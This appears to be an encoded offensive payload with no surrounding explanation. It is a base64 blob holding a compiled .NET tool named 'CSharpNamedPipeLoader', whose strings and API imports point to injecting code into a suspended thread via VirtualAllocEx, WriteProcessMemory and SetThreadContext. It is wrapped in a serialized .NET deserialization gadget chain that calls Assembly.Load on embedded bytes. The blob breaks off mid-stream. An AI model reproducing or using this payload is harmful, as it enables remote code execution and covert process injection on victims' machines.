UF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAFRhcmdldEZyYW1ld29ya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBCeXRlAEZsb2F0U2F2ZQBDU2hhcnBOYW1lZFBpcGVMb2FkZXIuZXhlAGR3U3RhY2tTaXplAG5TaXplAG5JbkJ1ZmZlclNpemUAbk91dEJ1ZmZlclNpemUAZHdTaXplAHNpemUAU2l6ZU9mAFN5c3RlbS5UaHJlYWRpbmcAU3lzdGVtLlJ1bnRpbWUuVmVyc2lvbmluZwBUb1N0cmluZwBIaWdoAGdldF9MZW5ndGgAbkxlbmd0aABFZGkAUmRpAEVzaQBSc2kATXhDc3JfTWFzawBBbGxvY0hHbG9iYWwATWFyc2hhbAB2YWwAU2V0U2VjdXJpdHlEZXNjcmlwdG9yRGFjbABkYWNsAHNhY2wAYWR2YXBpMzIuZGxsAGtlcm5lbDMyLmRsbABhc2NpaVN5bWJvbABEZWJ1Z0NvbnRyb2wAVmVjdG9yQ29udHJvbABjb250cm9sAHBhcmFtAFByb2dyYW0AU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBNYWluAGR3UmV2aXNpb24AcmV2aXNpb24AU3lzdGVtLlJlZmxlY3Rpb24AWmVybwBFYnAAUmJwAFNsZWVwAEVpcABMYXN0QnJhbmNoRnJvbVJpcABMYXN0RXhjZXB0aW9uRnJvbVJpcABMYXN0QnJhbmNoVG9SaXAATGFzdEV4Y2VwdGlvblRvUmlwAEhleER1bXAARXNwAFJzcABncm91cABTeXN0ZW0uTGlucQBDU2hhcnBOYW1lZFBpcGVMb2FkZXIAU3RyaW5nQnVpbGRlcgBscEJ1ZmZlcgBvd25lcgBWZWN0b3JSZWdpc3RlcgAuY3RvcgBEYXRhU2VsZWN0b3IARXJyb3JTZWxlY3RvcgBJbml0aWFsaXplU2VjdXJpdHlEZXNjcmlwdG9yAGxwU2VjdXJpdHlEZXNjcmlwdG9yAE14Q3NyAFN0cnVjdHVyZVRvUHRyAEludFB0cgBTZWdDcwBTZWdEcwBTZWdFcwBTZWdGcwBTZWdHcwBTZWdTcwBTeXN0ZW0uRGlhZ25vc3RpY3MAZHdNaWxsaXNlY29uZHMAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAbk1heEluc3RhbmNlcwBEZWJ1Z2dpbmdNb2RlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBTZWN1cml0eUF0dHJpYnV0ZXMAYnl0ZXMARUZsYWdzAGR3Q3JlYXRpb25GbGFncwBDb250ZXh0RmxhZ3MAYXJncwBVdGlscwBnZXRfQ2hhcnMARXh0ZW5kZWRSZWdpc3RlcnMAWG1tUmVnaXN0ZXJzAEZsb2F0UmVnaXN0ZXJzAFRocmVhZEFjY2VzcwBkd0Rlc2lyZWRBY2Nlc3MAaFByb2Nlc3MAR2V0Q3VycmVudFByb2Nlc3MAR2V0UHJvY0FkZHJlc3MAbHBCYXNlQWRkcmVzcwBscEFkZHJlc3MAbHBTdGFydEFkZHJlc3MAQ29uY2F0AEZvcm1hdABXYWl0Rm9yU2luZ2xlT2JqZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QARGF0YU9mZnNldABFcnJvck9mZnNldABFbnZpcm9ubWVudABkYWNsUHJlc2VudABuRGVmYXVsdFRpbWVPdXQAU3lzdGVtLlRleHQAR2V0VGhyZWFkQ29udGV4dABTZXRUaHJlYWRDb250ZXh0AGxwQ29udGV4dABMb3cAVmlydHVhbEFsbG9jRXgAVmlydHVhbFByb3RlY3RFeABFYXgAUmF4AEVieABSYngARWN4AFJjeABFZHgAUmR4AFRvQXJyYXkAVG9DaGFyQXJyYXkAUmVhZFByb2Nlc3NNZW1vcnkAV3JpdGVQcm9jZ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C4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBAAAAAHAAAACQMAAAAKCSQAAAAKCAgAAAAACggIAQAAAAERAAAADwAAAAYlAAAA9QJTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBIAAAAHAAAACQQAAAAKCSgAAAAKCAgAAAAACggIAQAAAAETAAAADwAAAAYpAAAA3wNTeXN0ZW0uTGlucS5FbnVtZXJhYmxlK1doZXJlU2VsZWN0RW51bWVyYWJsZUl0ZXJhdG9yYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAUAAAABwAAAAkFAAAACgksAAAACggIAAAAAAoICAEAAAABFQAAAA8AAAAGLQAAAOYCU3lzdGVtLkxpbnEuRW51bWVyYWJsZStXaGVyZVNlbGVjdEVudW1lcmFibGVJdGVyYXRvcmAyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAJIgAAABAWAAAABwAAAAkGAAAACTAAAAAJMQAAAAoICAAAAAAKCAgBAAAAARcAAAAPAAAABjIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkiAAAAEBgAAAAHAAAACQcAAAAKCTUAAAAKCAgAAAAACggIAQAAAAEZAAAADwAAAAY2AAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAY3AAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBoAAAAHAAAACQgAAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABGwAAAA8AAAAGOQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGOgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBwAAAAFAAAADQIJOwAAAAgIAwAAAAkLAAAAAR0AAAAPAAAABj0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGPgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQHgAAAAEAAAAJCQAAABAfAAAAAgAAAAkKAAAACQoAAAAQIAAAAAIAAAAGQQAAAAAJQQAAAAQkAAAAIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXICAAAACERlbGVnYXRlB21ldGhvZDADAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJQgAAAAlDAAAAASgAAAAkAAAACUQAAAAJRQAAAAEsAAAAJAAAAAlGAAAACUcAAAABMAAAACQAAAAJSAAAAAlJAAAAATEAAAAkAAAACUoAAAAJSwAAAAE1AAAAJAAAAAlMAAAACU0AAAABOwAAAAQAAAAJTgAAAAlPAAAABEIAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGUAAAANUBU3lzdGVtLkZ1bmNgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAGUgAAABpTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseQZTAAAABExvYWQKBEMAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCVMAAAAJPgAAAAlSAAAABlYAAAAnU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChCeXRlW10pBlcAAAAuU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkgTG9hZChTeXN0ZW0uQnl0ZVtdKQgAAAAKAUQAAABCAAAABlgAAADMAlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYWJsZWAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCT4AAAAKCT4AAAAJUgAAAAZbAAAACEdldFR5cGVzCgFFAAAAQwAAAAlbAAAACT4AAAAJUgAAAAZeAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQZfAAAAGFN5c3RlbS5UeXBlW10gR2V0VHlwZXMoKQgAAAAKAUYAAABCAAAABmAAAAC2A1N5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmIAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhYmxlYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQZjAAAADUdldEVudW1lcmF0b3IKAUcAAABDAAAACWMAAAAJPgAAAAliAAAABmYAAABFU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmF0b3JgMVtTeXN0ZW0uVHlwZV0gR2V0RW51bWVyYXRvcigpBmcAAACUAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXSBHZXRFbnVtZXJhdG9yKCkIAAAACgFIAAAAQgAAAAZoAAAAwAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5JRW51bWVyYXRvcmAxW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5Cb29sZWFuLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQk+AAAACgk+AAAABmoAAAAeU3lzdGVtLkNvbGxlY3Rpb25zLklFbnVtZXJhdG9yBmsAAAAITW92ZU5leHQKAUkAAABDAAAACWsAAAAJPgAAAAlqAAAABm4AAAASQm9vbGVhbiBNb3ZlTmV4dCgpBm8AAAAZU3lzdGVtLkJvb2xlYW4gTW92ZU5leHQoKQgAAAAKAUoAAABCAAAABnAAAAC9AlN5c3RlbS5GdW5jYDJbW1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLklFbnVtZXJhdG9yYDFbW1N5c3RlbS5UeXBlLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGU